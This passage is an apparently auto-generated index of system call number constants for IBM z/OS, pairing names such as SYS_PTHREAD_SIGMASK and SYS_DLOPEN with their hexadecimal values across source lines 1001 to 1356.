SYS___UFREE = 0x4FE constant SYS___UHEAPREPORT (line 1001) | SYS___UHEAPREPORT = 0x4FF constant SYS___UMALLOC (line 1002) | SYS___UMALLOC = 0x4FD constant SYS___Y0_B (line 1003) | SYS___Y0_B = 0x4E5 constant SYS___Y1_B (line 1004) | SYS___Y1_B = 0x4E7 constant SYS___YN_B (line 1005) | SYS___YN_B = 0x4E9 constant SYS_ABORT (line 1006) | SYS_ABORT = 0x05C constant SYS_ASCTIME_R (line 1007) | SYS_ASCTIME_R = 0x5E0 constant SYS_ATEXIT (line 1008) | SYS_ATEXIT = 0x05D constant SYS_CONNECTE (line 1009) | SYS_CONNECTE = 0x5AE constant SYS_CONNECTEXPORTIMPORT (line 1010) | SYS_CONNECTEXPORTIMPORT = 0x5AE constant SYS_CTIME_R (line 1011) | SYS_CTIME_R = 0x5E1 constant SYS_DN_COMP (line 1012) | SYS_DN_COMP = 0x5DF constant SYS_DN_EXPAND (line 1013) | SYS_DN_EXPAND = 0x5DD constant SYS_DN_SKIPNAME (line 1014) | SYS_DN_SKIPNAME = 0x5DE constant SYS_EXIT (line 1015) | SYS_EXIT = 0x05A constant SYS_EXPORTWO (line 1016) | SYS_EXPORTWO = 0x5A1 constant SYS_EXPORTWORKUNIT (line 1017) | SYS_EXPORTWORKUNIT = 0x5A1 constant SYS_EXTRACTW (line 1018) | SYS_EXTRACTW = 0x5A5 constant SYS_EXTRACTWORKUNIT (line 1019) | SYS_EXTRACTWORKUNIT = 0x5A5 constant SYS_FSEEKO (line 1020) | SYS_FSEEKO = 0x5C9 constant SYS_FTELLO (line 1021) | SYS_FTELLO = 0x5C8 constant SYS_GETGRGID_R (line 1022) | SYS_GETGRGID_R = 0x5E7 constant SYS_GETGRNAM_R (line 1023) | SYS_GETGRNAM_R = 0x5E8 constant SYS_GETLOGIN_R (line 1024) | SYS_GETLOGIN_R = 0x5E9 constant SYS_GETPWNAM_R (line 1025) | SYS_GETPWNAM_R = 0x5EA constant SYS_GETPWUID_R (line 1026) | SYS_GETPWUID_R = 0x5EB constant SYS_GMTIME_R (line 1027) | SYS_GMTIME_R = 0x5E2 constant SYS_IMPORTWO (line 1028) | SYS_IMPORTWO = 0x5A3 constant SYS_IMPORTWORKUNIT (line 1029) | SYS_IMPORTWORKUNIT = 0x5A3 constant SYS_INET_NTOP (line 1030) | SYS_INET_NTOP = 0x5D3 constant SYS_INET_PTON (line 1031) | SYS_INET_PTON = 0x5D4 constant SYS_LLABS (line 1032) | SYS_LLABS = 0x5CE constant SYS_LLDIV (line 1033) | SYS_LLDIV = 0x5CB constant SYS_LOCALTIME_R (line 1034) | SYS_LOCALTIME_R = 0x5E3 constant SYS_PTHREAD_ATFORK (line 1035) | SYS_PTHREAD_ATFORK = 0x5ED constant SYS_PTHREAD_ATTR_GETDETACHSTATE_U98 (line 1036) | SYS_PTHREAD_ATTR_GETDETACHSTATE_U98 = 0x5FB constant SYS_PTHREAD_ATTR_GETGUARDSIZE (line 1037) | SYS_PTHREAD_ATTR_GETGUARDSIZE = 0x5EE constant SYS_PTHREAD_ATTR_GETSCHEDPARAM (line 1038) | SYS_PTHREAD_ATTR_GETSCHEDPARAM = 0x5F9 constant SYS_PTHREAD_ATTR_GETSTACKADDR (line 1039) | SYS_PTHREAD_ATTR_GETSTACKADDR = 0x5EF constant SYS_PTHREAD_ATTR_SETDETACHSTATE_U98 (line 1040) | SYS_PTHREAD_ATTR_SETDETACHSTATE_U98 = 0x5FC constant SYS_PTHREAD_ATTR_SETGUARDSIZE (line 1041) | SYS_PTHREAD_ATTR_SETGUARDSIZE = 0x5F0 constant SYS_PTHREAD_ATTR_SETSCHEDPARAM (line 1042) | SYS_PTHREAD_ATTR_SETSCHEDPARAM = 0x5FA constant SYS_PTHREAD_ATTR_SETSTACKADDR (line 1043) | SYS_PTHREAD_ATTR_SETSTACKADDR = 0x5F1 constant SYS_PTHREAD_CONDATTR_GETPSHARED (line 1044) | SYS_PTHREAD_CONDATTR_GETPSHARED = 0x5F2 constant SYS_PTHREAD_CONDATTR_SETPSHARED (line 1045) | SYS_PTHREAD_CONDATTR_SETPSHARED = 0x5F3 constant SYS_PTHREAD_DETACH_U98 (line 1046) | SYS_PTHREAD_DETACH_U98 = 0x5FD constant SYS_PTHREAD_GETCONCURRENCY (line 1047) | SYS_PTHREAD_GETCONCURRENCY = 0x5F4 constant SYS_PTHREAD_GETSPECIFIC_U98 (line 1048) | SYS_PTHREAD_GETSPECIFIC_U98 = 0x5FE constant SYS_PTHREAD_KEY_DELETE (line 1049) | SYS_PTHREAD_KEY_DELETE = 0x5F5 constant SYS_PTHREAD_SETCANCELSTATE (line 1050) | SYS_PTHREAD_SETCANCELSTATE = 0x5FF constant SYS_PTHREAD_SETCONCURRENCY (line 1051) | SYS_PTHREAD_SETCONCURRENCY = 0x5F6 constant SYS_PTHREAD_SIGMASK (line 1052) | SYS_PTHREAD_SIGMASK = 0x5F7 constant SYS_QUERYENC (line 1053) | SYS_QUERYENC = 0x5AD constant SYS_QUERYWORKUNITCLASSIFICATION (line 1054) | SYS_QUERYWORKUNITCLASSIFICATION = 0x5AD constant SYS_RAISE (line 1055) | SYS_RAISE = 0x05E constant SYS_RAND_R (line 1056) | SYS_RAND_R = 0x5E4 constant SYS_READDIR_R (line 1057) | SYS_READDIR_R = 0x5E6 constant SYS_REALLOC (line 1058) | SYS_REALLOC = 0x05B constant SYS_RES_INIT (line 1059) | SYS_RES_INIT = 0x5D8 constant SYS_RES_MKQUERY (line 1060) | SYS_RES_MKQUERY = 0x5D7 constant SYS_RES_QUERY (line 1061) | SYS_RES_QUERY = 0x5D9 constant SYS_RES_QUERYDOMAIN (line 1062) | SYS_RES_QUERYDOMAIN = 0x5DC constant SYS_RES_SEARCH (line 1063) | SYS_RES_SEARCH = 0x5DA constant SYS_RES_SEND (line 1064) | SYS_RES_SEND = 0x5DB constant SYS_SETJMP (line 1065) | SYS_SETJMP = 0x05F constant SYS_SIGQUEUE (line 1066) | SYS_SIGQUEUE = 0x5A9 constant SYS_STRTOK_R (line 1067) | SYS_STRTOK_R = 0x5E5 constant SYS_STRTOLL (line 1068) | SYS_STRTOLL = 0x5B0 constant SYS_STRTOULL (line 1069) | SYS_STRTOULL = 0x5B1 constant SYS_TTYNAME_R (line 1070) | SYS_TTYNAME_R = 0x5EC constant SYS_UNDOEXPO (line 1071) | SYS_UNDOEXPO = 0x5A2 constant SYS_UNDOEXPORTWORKUNIT (line 1072) | SYS_UNDOEXPORTWORKUNIT = 0x5A2 constant SYS_UNDOIMPO (line 1073) | SYS_UNDOIMPO = 0x5A4 constant SYS_UNDOIMPORTWORKUNIT (line 1074) | SYS_UNDOIMPORTWORKUNIT = 0x5A4 constant SYS_WCSTOLL (line 1075) | SYS_WCSTOLL = 0x5CC constant SYS_WCSTOULL (line 1076) | SYS_WCSTOULL = 0x5CD constant SYS___ABORT (line 1077) | SYS___ABORT = 0x05C constant SYS___CONSOLE2 (line 1078) | SYS___CONSOLE2 = 0x5D2 constant SYS___CPL (line 1079) | SYS___CPL = 0x5A6 constant SYS___DISCARDDATA (line 1080) | SYS___DISCARDDATA = 0x5F8 constant SYS___DSA_PREV (line 1081) | SYS___DSA_PREV = 0x5B2 constant SYS___EP_FIND (line 1082) | SYS___EP_FIND = 0x5B3 constant SYS___FP_SWAPMODE (line 1083) | SYS___FP_SWAPMODE = 0x5AF constant SYS___GETUSERID (line 1084) | SYS___GETUSERID = 0x5AB constant SYS___GET_CPUID (line 1085) | SYS___GET_CPUID = 0x5B9 constant SYS___GET_SYSTEM_SETTINGS (line 1086) | SYS___GET_SYSTEM_SETTINGS = 0x5BA constant SYS___IPDOMAINNAME (line 1087) | SYS___IPDOMAINNAME = 0x5AC constant SYS___MAP_INIT (line 1088) | SYS___MAP_INIT = 0x5A7 constant SYS___MAP_SERVICE (line 1089) | SYS___MAP_SERVICE = 0x5A8 constant SYS___MOUNT (line 1090) | SYS___MOUNT = 0x5AA constant SYS___MSGRCV_TIMED (line 1091) | SYS___MSGRCV_TIMED = 0x5B7 constant SYS___RES (line 1092) | SYS___RES = 0x5D6 constant SYS___SEMOP_TIMED (line 1093) | SYS___SEMOP_TIMED = 0x5B8 constant SYS___SERVER_THREADS_QUERY (line 1094) | SYS___SERVER_THREADS_QUERY = 0x5B4 constant SYS_FPRINTF (line 1095) | SYS_FPRINTF = 0x06D constant SYS_FSCANF (line 1096) | SYS_FSCANF = 0x06A constant SYS_PRINTF (line 1097) | SYS_PRINTF = 0x06F constant SYS_SETBUF (line 1098) | SYS_SETBUF = 0x06B constant SYS_SETVBUF (line 1099) | SYS_SETVBUF = 0x06C constant SYS_SSCANF (line 1100) | SYS_SSCANF = 0x06E constant SYS___CATGETS_A (line 1101) | SYS___CATGETS_A = 0x6C0 constant SYS___CHAUDIT_A (line 1102) | SYS___CHAUDIT_A = 0x6F4 constant SYS___CHMOD_A (line 1103) | SYS___CHMOD_A = 0x6E8 constant SYS___COLLATE_INIT_A (line 1104) | SYS___COLLATE_INIT_A = 0x6AC constant SYS___CREAT_A (line 1105) | SYS___CREAT_A = 0x6F6 constant SYS___CTYPE_INIT_A (line 1106) | SYS___CTYPE_INIT_A = 0x6AF constant SYS___DLLLOAD_A (line 1107) | SYS___DLLLOAD_A = 0x6DF constant SYS___DLLQUERYFN_A (line 1108) | SYS___DLLQUERYFN_A = 0x6E0 constant SYS___DLLQUERYVAR_A (line 1109) | SYS___DLLQUERYVAR_A = 0x6E1 constant SYS___E2A_L (line 1110) | SYS___E2A_L = 0x6E3 constant SYS___EXECLE_A (line 1111) | SYS___EXECLE_A = 0x6A0 constant SYS___EXECLP_A (line 1112) | SYS___EXECLP_A = 0x6A4 constant SYS___EXECVE_A (line 1113) | SYS___EXECVE_A = 0x6C1 constant SYS___EXECVP_A (line 1114) | SYS___EXECVP_A = 0x6C2 constant SYS___EXECV_A (line 1115) | SYS___EXECV_A = 0x6B1 constant SYS___FPRINTF_A (line 1116) | SYS___FPRINTF_A = 0x6FA constant SYS___GETADDRINFO_A (line 1117) | SYS___GETADDRINFO_A = 0x6BF constant SYS___GETNAMEINFO_A (line 1118) | SYS___GETNAMEINFO_A = 0x6C4 constant SYS___GET_WCTYPE_STD_A (line 1119) | SYS___GET_WCTYPE_STD_A = 0x6AE constant SYS___ICONV_OPEN_A (line 1120) | SYS___ICONV_OPEN_A = 0x6DE constant SYS___IF_INDEXTONAME_A (line 1121) | SYS___IF_INDEXTONAME_A = 0x6DC constant SYS___IF_NAMETOINDEX_A (line 1122) | SYS___IF_NAMETOINDEX_A = 0x6DB constant SYS___ISWCTYPE_A (line 1123) | SYS___ISWCTYPE_A = 0x6B0 constant SYS___IS_WCTYPE_STD_A (line 1124) | SYS___IS_WCTYPE_STD_A = 0x6B2 constant SYS___LOCALECONV_A (line 1125) | SYS___LOCALECONV_A = 0x6B8 constant SYS___LOCALECONV_STD_A (line 1126) | SYS___LOCALECONV_STD_A = 0x6B9 constant SYS___LOCALE_INIT_A (line 1127) | SYS___LOCALE_INIT_A = 0x6B7 constant SYS___LSTAT_A (line 1128) | SYS___LSTAT_A = 0x6EE constant SYS___LSTAT_O_A (line 1129) | SYS___LSTAT_O_A = 0x6EF constant SYS___MKDIR_A (line 1130) | SYS___MKDIR_A = 0x6E9 constant SYS___MKFIFO_A (line 1131) | SYS___MKFIFO_A = 0x6EC constant SYS___MKNOD_A (line 1132) | SYS___MKNOD_A = 0x6F0 constant SYS___MONETARY_INIT_A (line 1133) | SYS___MONETARY_INIT_A = 0x6BC constant SYS___MOUNT_A (line 1134) | SYS___MOUNT_A = 0x6F1 constant SYS___NL_CSINFO_A (line 1135) | SYS___NL_CSINFO_A = 0x6D6 constant SYS___NL_LANGINFO_A (line 1136) | SYS___NL_LANGINFO_A = 0x6BA constant SYS___NL_LNAGINFO_STD_A (line 1137) | SYS___NL_LNAGINFO_STD_A = 0x6BB constant SYS___NL_MONINFO_A (line 1138) | SYS___NL_MONINFO_A = 0x6D7 constant SYS___NL_NUMINFO_A (line 1139) | SYS___NL_NUMINFO_A = 0x6D8 constant SYS___NL_RESPINFO_A (line 1140) | SYS___NL_RESPINFO_A = 0x6D9 constant SYS___NL_TIMINFO_A (line 1141) | SYS___NL_TIMINFO_A = 0x6DA constant SYS___NUMERIC_INIT_A (line 1142) | SYS___NUMERIC_INIT_A = 0x6C6 constant SYS___OPEN_A (line 1143) | SYS___OPEN_A = 0x6F7 constant SYS___PRINTF_A (line 1144) | SYS___PRINTF_A = 0x6DD constant SYS___RESP_INIT_A (line 1145) | SYS___RESP_INIT_A = 0x6C7 constant SYS___RPMATCH_A (line 1146) | SYS___RPMATCH_A = 0x6C8 constant SYS___RPMATCH_C_A (line 1147) | SYS___RPMATCH_C_A = 0x6C9 constant SYS___RPMATCH_STD_A (line 1148) | SYS___RPMATCH_STD_A = 0x6CA constant SYS___SETLOCALE_A (line 1149) | SYS___SETLOCALE_A = 0x6F9 constant SYS___SPAWNP_A (line 1150) | SYS___SPAWNP_A = 0x6C5 constant SYS___SPAWN_A (line 1151) | SYS___SPAWN_A = 0x6C3 constant SYS___SPRINTF_A (line 1152) | SYS___SPRINTF_A = 0x6FB constant SYS___STAT_A (line 1153) | SYS___STAT_A = 0x6EA constant SYS___STAT_O_A (line 1154) | SYS___STAT_O_A = 0x6EB constant SYS___STRCOLL_STD_A (line 1155) | SYS___STRCOLL_STD_A = 0x6A1 constant SYS___STRFMON_A (line 1156) | SYS___STRFMON_A = 0x6BD constant SYS___STRFMON_STD_A (line 1157) | SYS___STRFMON_STD_A = 0x6BE constant SYS___STRFTIME_A (line 1158) | SYS___STRFTIME_A = 0x6CC constant SYS___STRFTIME_STD_A (line 1159) | SYS___STRFTIME_STD_A = 0x6CD constant SYS___STRPTIME_A (line 1160) | SYS___STRPTIME_A = 0x6CE constant SYS___STRPTIME_STD_A (line 1161) | SYS___STRPTIME_STD_A = 0x6CF constant SYS___STRXFRM_A (line 1162) | SYS___STRXFRM_A = 0x6A2 constant SYS___STRXFRM_C_A (line 1163) | SYS___STRXFRM_C_A = 0x6A3 constant SYS___STRXFRM_STD_A (line 1164) | SYS___STRXFRM_STD_A = 0x6A5 constant SYS___SYNTAX_INIT_A (line 1165) | SYS___SYNTAX_INIT_A = 0x6D4 constant SYS___TIME_INIT_A (line 1166) | SYS___TIME_INIT_A = 0x6CB constant SYS___TOD_INIT_A (line 1167) | SYS___TOD_INIT_A = 0x6D5 constant SYS___TOWLOWER_A (line 1168) | SYS___TOWLOWER_A = 0x6B3 constant SYS___TOWLOWER_STD_A (line 1169) | SYS___TOWLOWER_STD_A = 0x6B4 constant SYS___TOWUPPER_A (line 1170) | SYS___TOWUPPER_A = 0x6B5 constant SYS___TOWUPPER_STD_A (line 1171) | SYS___TOWUPPER_STD_A = 0x6B6 constant SYS___UMOUNT_A (line 1172) | SYS___UMOUNT_A = 0x6F2 constant SYS___VFPRINTF_A (line 1173) | SYS___VFPRINTF_A = 0x6FC constant SYS___VPRINTF_A (line 1174) | SYS___VPRINTF_A = 0x6FD constant SYS___VSPRINTF_A (line 1175) | SYS___VSPRINTF_A = 0x6FE constant SYS___VSWPRINTF_A (line 1176) | SYS___VSWPRINTF_A = 0x6FF constant SYS___WCSCOLL_A (line 1177) | SYS___WCSCOLL_A = 0x6A6 constant SYS___WCSCOLL_C_A (line 1178) | SYS___WCSCOLL_C_A = 0x6A7 constant SYS___WCSCOLL_STD_A (line 1179) | SYS___WCSCOLL_STD_A = 0x6A8 constant SYS___WCSFTIME_A (line 1180) | SYS___WCSFTIME_A = 0x6D0 constant SYS___WCSFTIME_STD_A (line 1181) | SYS___WCSFTIME_STD_A = 0x6D1 constant SYS___WCSXFRM_A (line 1182) | SYS___WCSXFRM_A = 0x6A9 constant SYS___WCSXFRM_C_A (line 1183) | SYS___WCSXFRM_C_A = 0x6AA constant SYS___WCSXFRM_STD_A (line 1184) | SYS___WCSXFRM_STD_A = 0x6AB constant SYS___WCTYPE_A (line 1185) | SYS___WCTYPE_A = 0x6AD constant SYS___W_GETMNTENT_A (line 1186) | SYS___W_GETMNTENT_A = 0x6F5 constant SYS_____CCSIDTYPE_A (line 1187) | SYS_____CCSIDTYPE_A = 0x6E6 constant SYS_____CHATTR_A (line 1188) | SYS_____CHATTR_A = 0x6E2 constant SYS_____CSNAMETYPE_A (line 1189) | SYS_____CSNAMETYPE_A = 0x6E7 constant SYS_____OPEN_STAT_A (line 1190) | SYS_____OPEN_STAT_A = 0x6ED constant SYS_____SPAWN2_A (line 1191) | SYS_____SPAWN2_A = 0x6D2 constant SYS_____SPAWNP2_A (line 1192) | SYS_____SPAWNP2_A = 0x6D3 constant SYS_____TOCCSID_A (line 1193) | SYS_____TOCCSID_A = 0x6E4 constant SYS_____TOCSNAME_A (line 1194) | SYS_____TOCSNAME_A = 0x6E5 constant SYS_ACL_FREE (line 1195) | SYS_ACL_FREE = 0x7FF constant SYS_ACL_INIT (line 1196) | SYS_ACL_INIT = 0x7FE constant SYS_FWIDE (line 1197) | SYS_FWIDE = 0x7DF constant SYS_FWPRINTF (line 1198) | SYS_FWPRINTF = 0x7D1 constant SYS_FWRITE (line 1199) | SYS_FWRITE = 0x07E constant SYS_FWSCANF (line 1200) | SYS_FWSCANF = 0x7D5 constant SYS_GETCHAR (line 1201) | SYS_GETCHAR = 0x07B constant SYS_GETS (line 1202) | SYS_GETS = 0x07C constant SYS_M_CREATE_LAYOUT (line 1203) | SYS_M_CREATE_LAYOUT = 0x7C9 constant SYS_M_DESTROY_LAYOUT (line 1204) | SYS_M_DESTROY_LAYOUT = 0x7CA constant SYS_M_GETVALUES_LAYOUT (line 1205) | SYS_M_GETVALUES_LAYOUT = 0x7CB constant SYS_M_SETVALUES_LAYOUT (line 1206) | SYS_M_SETVALUES_LAYOUT = 0x7CC constant SYS_M_TRANSFORM_LAYOUT (line 1207) | SYS_M_TRANSFORM_LAYOUT = 0x7CD constant SYS_M_WTRANSFORM_LAYOUT (line 1208) | SYS_M_WTRANSFORM_LAYOUT = 0x7CE constant SYS_PREAD (line 1209) | SYS_PREAD = 0x7C7 constant SYS_PUTC (line 1210) | SYS_PUTC = 0x07D constant SYS_PUTCHAR (line 1211) | SYS_PUTCHAR = 0x07A constant SYS_PUTS (line 1212) | SYS_PUTS = 0x07F constant SYS_PWRITE (line 1213) | SYS_PWRITE = 0x7C8 constant SYS_TOWCTRAN (line 1214) | SYS_TOWCTRAN = 0x7D8 constant SYS_TOWCTRANS (line 1215) | SYS_TOWCTRANS = 0x7D8 constant SYS_UNATEXIT (line 1216) | SYS_UNATEXIT = 0x7B5 constant SYS_VFWPRINT (line 1217) | SYS_VFWPRINT = 0x7D3 constant SYS_VFWPRINTF (line 1218) | SYS_VFWPRINTF = 0x7D3 constant SYS_VWPRINTF (line 1219) | SYS_VWPRINTF = 0x7D4 constant SYS_WCTRANS (line 1220) | SYS_WCTRANS = 0x7D7 constant SYS_WPRINTF (line 1221) | SYS_WPRINTF = 0x7D2 constant SYS_WSCANF (line 1222) | SYS_WSCANF = 0x7D6 constant SYS___ASCTIME_R_A (line 1223) | SYS___ASCTIME_R_A = 0x7A1 constant SYS___BASENAME_A (line 1224) | SYS___BASENAME_A = 0x7DC constant SYS___BTOWC_A (line 1225) | SYS___BTOWC_A = 0x7E4 constant SYS___CDUMP_A (line 1226) | SYS___CDUMP_A = 0x7B7 constant SYS___CEE3DMP_A (line 1227) | SYS___CEE3DMP_A = 0x7B6 constant SYS___CEILF_H (line 1228) | SYS___CEILF_H = 0x7F4 constant SYS___CEILL_H (line 1229) | SYS___CEILL_H = 0x7F5 constant SYS___CEIL_H (line 1230) | SYS___CEIL_H = 0x7EA constant SYS___CRYPT_A (line 1231) | SYS___CRYPT_A = 0x7BE constant SYS___CSNAP_A (line 1232) | SYS___CSNAP_A = 0x7B8 constant SYS___CTEST_A (line 1233) | SYS___CTEST_A = 0x7B9 constant SYS___CTIME_R_A (line 1234) | SYS___CTIME_R_A = 0x7A2 constant SYS___CTRACE_A (line 1235) | SYS___CTRACE_A = 0x7BA constant SYS___DBM_OPEN_A (line 1236) | SYS___DBM_OPEN_A = 0x7E6 constant SYS___DIRNAME_A (line 1237) | SYS___DIRNAME_A = 0x7DD constant SYS___FABSF_H (line 1238) | SYS___FABSF_H = 0x7FA constant SYS___FABSL_H (line 1239) | SYS___FABSL_H = 0x7FB constant SYS___FABS_H (line 1240) | SYS___FABS_H = 0x7ED constant SYS___FGETWC_A (line 1241) | SYS___FGETWC_A = 0x7AA constant SYS___FGETWS_A (line 1242) | SYS___FGETWS_A = 0x7AD constant SYS___FLOORF_H (line 1243) | SYS___FLOORF_H = 0x7F6 constant SYS___FLOORL_H (line 1244) | SYS___FLOORL_H = 0x7F7 constant SYS___FLOOR_H (line 1245) | SYS___FLOOR_H = 0x7EB constant SYS___FPUTWC_A (line 1246) | SYS___FPUTWC_A = 0x7A5 constant SYS___FPUTWS_A (line 1247) | SYS___FPUTWS_A = 0x7A8 constant SYS___GETTIMEOFDAY_A (line 1248) | SYS___GETTIMEOFDAY_A = 0x7AE constant SYS___GETWCHAR_A (line 1249) | SYS___GETWCHAR_A = 0x7AC constant SYS___GETWC_A (line 1250) | SYS___GETWC_A = 0x7AB constant SYS___GLOB_A (line 1251) | SYS___GLOB_A = 0x7DE constant SYS___GMTIME_A (line 1252) | SYS___GMTIME_A = 0x7AF constant SYS___GMTIME_R_A (line 1253) | SYS___GMTIME_R_A = 0x7B0 constant SYS___INET_PTON_A (line 1254) | SYS___INET_PTON_A = 0x7BC constant SYS___J0_H (line 1255) | SYS___J0_H = 0x7EE constant SYS___J1_H (line 1256) | SYS___J1_H = 0x7EF constant SYS___JN_H (line 1257) | SYS___JN_H = 0x7F0 constant SYS___LOCALTIME_A (line 1258) | SYS___LOCALTIME_A = 0x7B1 constant SYS___LOCALTIME_R_A (line 1259) | SYS___LOCALTIME_R_A = 0x7B2 constant SYS___MALLOC24 (line 1260) | SYS___MALLOC24 = 0x7FC constant SYS___MALLOC31 (line 1261) | SYS___MALLOC31 = 0x7FD constant SYS___MKTIME_A (line 1262) | SYS___MKTIME_A = 0x7B3 constant SYS___MODFF_H (line 1263) | SYS___MODFF_H = 0x7F8 constant SYS___MODFL_H (line 1264) | SYS___MODFL_H = 0x7F9 constant SYS___MODF_H (line 1265) | SYS___MODF_H = 0x7EC constant SYS___OPENDIR_A (line 1266) | SYS___OPENDIR_A = 0x7C2 constant SYS___OSNAME (line 1267) | SYS___OSNAME = 0x7E0 constant SYS___PUTWCHAR_A (line 1268) | SYS___PUTWCHAR_A = 0x7A7 constant SYS___PUTWC_A (line 1269) | SYS___PUTWC_A = 0x7A6 constant SYS___READDIR_A (line 1270) | SYS___READDIR_A = 0x7C3 constant SYS___STRTOLL_A (line 1271) | SYS___STRTOLL_A = 0x7A3 constant SYS___STRTOULL_A (line 1272) | SYS___STRTOULL_A = 0x7A4 constant SYS___SYSLOG_A (line 1273) | SYS___SYSLOG_A = 0x7BD constant SYS___TZZNA (line 1274) | SYS___TZZNA = 0x7B4 constant SYS___UNGETWC_A (line 1275) | SYS___UNGETWC_A = 0x7A9 constant SYS___UTIME_A (line 1276) | SYS___UTIME_A = 0x7A0 constant SYS___VFPRINTF2_A (line 1277) | SYS___VFPRINTF2_A = 0x7E7 constant SYS___VPRINTF2_A (line 1278) | SYS___VPRINTF2_A = 0x7E8 constant SYS___VSPRINTF2_A (line 1279) | SYS___VSPRINTF2_A = 0x7E9 constant SYS___VSWPRNTF2_A (line 1280) | SYS___VSWPRNTF2_A = 0x7BB constant SYS___WCSTOD_A (line 1281) | SYS___WCSTOD_A = 0x7D9 constant SYS___WCSTOL_A (line 1282) | SYS___WCSTOL_A = 0x7DA constant SYS___WCSTOUL_A (line 1283) | SYS___WCSTOUL_A = 0x7DB constant SYS___WCTOB_A (line 1284) | SYS___WCTOB_A = 0x7E5 constant SYS___Y0_H (line 1285) | SYS___Y0_H = 0x7F1 constant SYS___Y1_H (line 1286) | SYS___Y1_H = 0x7F2 constant SYS___YN_H (line 1287) | SYS___YN_H = 0x7F3 constant SYS_____OPENDIR2_A (line 1288) | SYS_____OPENDIR2_A = 0x7BF constant SYS_____OSNAME_A (line 1289) | SYS_____OSNAME_A = 0x7E1 constant SYS_____READDIR2_A (line 1290) | SYS_____READDIR2_A = 0x7C0 constant SYS_DLCLOSE (line 1291) | SYS_DLCLOSE = 0x8DF constant SYS_DLERROR (line 1292) | SYS_DLERROR = 0x8E0 constant SYS_DLOPEN (line 1293) | SYS_DLOPEN = 0x8DD constant SYS_DLSYM (line 1294) | SYS_DLSYM = 0x8DE constant SYS_FLOCKFILE (line 1295) | SYS_FLOCKFILE = 0x8D3 constant SYS_FTRYLOCKFILE (line 1296) | SYS_FTRYLOCKFILE = 0x8D4 constant SYS_FUNLOCKFILE (line 1297) | SYS_FUNLOCKFILE = 0x8D5 constant SYS_GETCHAR_UNLOCKED (line 1298) | SYS_GETCHAR_UNLOCKED = 0x8D7 constant SYS_GETC_UNLOCKED (line 1299) | SYS_GETC_UNLOCKED = 0x8D6 constant SYS_PUTCHAR_UNLOCKED (line 1300) | SYS_PUTCHAR_UNLOCKED = 0x8D9 constant SYS_PUTC_UNLOCKED (line 1301) | SYS_PUTC_UNLOCKED = 0x8D8 constant SYS_SNPRINTF (line 1302) | SYS_SNPRINTF = 0x8DA constant SYS_VSNPRINTF (line 1303) | SYS_VSNPRINTF = 0x8DB constant SYS_WCSCSPN (line 1304) | SYS_WCSCSPN = 0x08B constant SYS_WCSLEN (line 1305) | SYS_WCSLEN = 0x08C constant SYS_WCSNCAT (line 1306) | SYS_WCSNCAT = 0x08D constant SYS_WCSNCMP (line 1307) | SYS_WCSNCMP = 0x08A constant SYS_WCSNCPY (line 1308) | SYS_WCSNCPY = 0x08F constant SYS_WCSSPN (line 1309) | SYS_WCSSPN = 0x08E constant SYS___ABSF_H (line 1310) | SYS___ABSF_H = 0x8E7 constant SYS___ABSL_H (line 1311) | SYS___ABSL_H = 0x8E8 constant SYS___ABS_H (line 1312) | SYS___ABS_H = 0x8E6 constant SYS___ACOSF_H (line 1313) | SYS___ACOSF_H = 0x8EA constant SYS___ACOSH_H (line 1314) | SYS___ACOSH_H = 0x8EC constant SYS___ACOSL_H (line 1315) | SYS___ACOSL_H = 0x8EB constant SYS___ACOS_H (line 1316) | SYS___ACOS_H = 0x8E9 constant SYS___ASINF_H (line 1317) | SYS___ASINF_H = 0x8EE constant SYS___ASINH_H (line 1318) | SYS___ASINH_H = 0x8F0 constant SYS___ASINL_H (line 1319) | SYS___ASINL_H = 0x8EF constant SYS___ASIN_H (line 1320) | SYS___ASIN_H = 0x8ED constant SYS___ATAN2F_H (line 1321) | SYS___ATAN2F_H = 0x8F8 constant SYS___ATAN2L_H (line 1322) | SYS___ATAN2L_H = 0x8F9 constant SYS___ATAN2_H (line 1323) | SYS___ATAN2_H = 0x8F7 constant SYS___ATANF_H (line 1324) | SYS___ATANF_H = 0x8F2 constant SYS___ATANHF_H (line 1325) | SYS___ATANHF_H = 0x8F5 constant SYS___ATANHL_H (line 1326) | SYS___ATANHL_H = 0x8F6 constant SYS___ATANH_H (line 1327) | SYS___ATANH_H = 0x8F4 constant SYS___ATANL_H (line 1328) | SYS___ATANL_H = 0x8F3 constant SYS___ATAN_H (line 1329) | SYS___ATAN_H = 0x8F1 constant SYS___CBRT_H (line 1330) | SYS___CBRT_H = 0x8FA constant SYS___COPYSIGNF_H (line 1331) | SYS___COPYSIGNF_H = 0x8FB constant SYS___COPYSIGNL_H (line 1332) | SYS___COPYSIGNL_H = 0x8FC constant SYS___COSF_H (line 1333) | SYS___COSF_H = 0x8FE constant SYS___COSL_H (line 1334) | SYS___COSL_H = 0x8FF constant SYS___COS_H (line 1335) | SYS___COS_H = 0x8FD constant SYS___DLERROR_A (line 1336) | SYS___DLERROR_A = 0x8D2 constant SYS___DLOPEN_A (line 1337) | SYS___DLOPEN_A = 0x8D0 constant SYS___DLSYM_A (line 1338) | SYS___DLSYM_A = 0x8D1 constant SYS___GETUTXENT_A (line 1339) | SYS___GETUTXENT_A = 0x8C6 constant SYS___GETUTXID_A (line 1340) | SYS___GETUTXID_A = 0x8C7 constant SYS___GETUTXLINE_A (line 1341) | SYS___GETUTXLINE_A = 0x8C8 constant SYS___ITOA (line 1342) | SYS___ITOA = 0x8AA constant SYS___ITOA_A (line 1343) | SYS___ITOA_A = 0x8B0 constant SYS___LE_CONDITION_TOKEN_BUILD (line 1344) | SYS___LE_CONDITION_TOKEN_BUILD = 0x8A5 constant SYS___LE_MSG_ADD_INSERT (line 1345) | SYS___LE_MSG_ADD_INSERT = 0x8A6 constant SYS___LE_MSG_GET (line 1346) | SYS___LE_MSG_GET = 0x8A7 constant SYS___LE_MSG_GET_AND_WRITE (line 1347) | SYS___LE_MSG_GET_AND_WRITE = 0x8A8 constant SYS___LE_MSG_WRITE (line 1348) | SYS___LE_MSG_WRITE = 0x8A9 constant SYS___LLTOA (line 1349) | SYS___LLTOA = 0x8AE constant SYS___LLTOA_A (line 1350) | SYS___LLTOA_A = 0x8B4 constant SYS___LTOA (line 1351) | SYS___LTOA = 0x8AC constant SYS___LTOA_A (line 1352) | SYS___LTOA_A = 0x8B2 constant SYS___PUTCHAR_UNLOCKED_A (line 1353) | SYS___PUTCHAR_UNLOCKED_A = 0x8CC constant SYS___PUTC_UNLOCKED_A (line 1354) | SYS___PUTC_UNLOCKED_A = 0x8CB constant SYS___PUTUTXLINE_A (line 1355) | SYS___PUTUTXLINE_A = 0x8C9 constant SYS___RESET_EXCEPTION_HANDLER (line 1356) | SYS___RESET_EXCEPTION_HANDLER = 